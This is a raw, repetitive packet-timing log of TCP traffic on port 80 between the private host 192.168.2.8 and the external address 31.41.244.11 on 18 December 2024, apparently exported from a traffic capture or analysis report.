                                                                                                                                                                                          Dec 18, 2024 09:07:23.250283003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.250339031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.250349045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.250391006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.251097918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.251147032 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.251148939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.251159906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.251193047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252078056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252129078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252135038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252146959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252177954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.252199888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253055096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253066063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253076077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253108025 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253143072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253789902 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253843069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253968000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.253989935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254014969 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254034042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254555941 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254611015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254614115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254626036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.254662991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255444050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255494118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255508900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255521059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255553007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.255574942 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.256283998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.256333113 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.256366014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.256376982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.256414890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.257157087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.257211924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.257220984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.257226944 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.257258892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258038998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258086920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258099079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258126974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258136988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258176088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258920908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258975983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258982897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.258991957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.259026051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.259052992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.259779930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.259835958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260071993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260123014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260149956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260160923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260205030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260234118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260937929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260986090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260989904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.260996103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261042118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261833906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261862993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261874914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261885881 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.261934996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.262679100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.262731075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.262736082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.262747049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.262788057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.263582945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.263633966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.263643980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.263655901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.263698101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264442921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264497995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264527082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264537096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264578104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.264600039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265294075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265345097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265362024 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265373945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265403986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.265425920 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.266165018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.266205072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.266213894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.266216040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.266249895 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267066956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267117023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267153025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267163992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267196894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267930984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.267977953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268017054 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268028975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268065929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268769979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268817902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268846035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268857956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.268891096 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.269634008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.269684076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.269700050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.269711018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.269743919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.270486116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.270534992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.431732893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.431760073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.431771040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.431962967 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432056904 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432117939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432128906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432178974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432920933 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432975054 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.432993889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433006048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433053970 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433808088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433876991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433887959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.433934927 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.434675932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.434730053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.434741020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.434783936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.435523987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.435571909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.435580015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.435583115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.435632944 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.436419010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.436456919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.436470032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.436479092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.436527014 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.437330961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.437383890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.437390089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.437397003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.437436104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438150883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438189983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438201904 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438218117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438246012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.438993931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439045906 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439050913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439063072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439099073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439121962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439846992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439934015 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439944983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.439990997 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440763950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440804005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440814018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440815926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440845013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.440866947 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.441636086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.441687107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.441689014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.441701889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.441742897 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.442478895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.442573071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.442584038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.442621946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.443337917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.443406105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.443417072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.443459034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.444227934 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.444268942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.444279909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.444329023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445205927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445219040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445233107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445261955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445290089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.445990086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446072102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446083069 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446124077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446847916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446963072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.446975946 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447016001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447741032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447788000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447788954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447799921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447827101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.447849035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.448621035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.448632956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.448642969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.448681116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.448710918 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.449489117 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.449500084 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.449510098 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.449546099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.449579954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.450439930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.450450897 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.450460911 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.450498104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.451174974 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.451267004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.451278925 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.451324940 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452097893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452148914 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452392101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452482939 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452493906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.452543020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.453311920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.453322887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.453332901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.453372955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.453398943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.454082966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.454176903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.454188108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.454238892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.454937935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455065012 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455075979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455116034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455142975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455894947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455905914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455916882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455952883 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.455993891 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.456722021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.456831932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.456842899 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.456886053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.457541943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.457612038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.457623005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.457663059 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.457689047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.458481073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.458492994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.458503962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.458539009 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.458581924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.459300995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.459367037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.459378004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.459414959 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.459455967 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.460192919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.460213900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.460225105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.460264921 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.460293055 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.461165905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.461213112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.461225033 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.461262941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.461297989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.462111950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:23.462490082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:23.626900911 CET804971431.41.244.11192.168.2.8
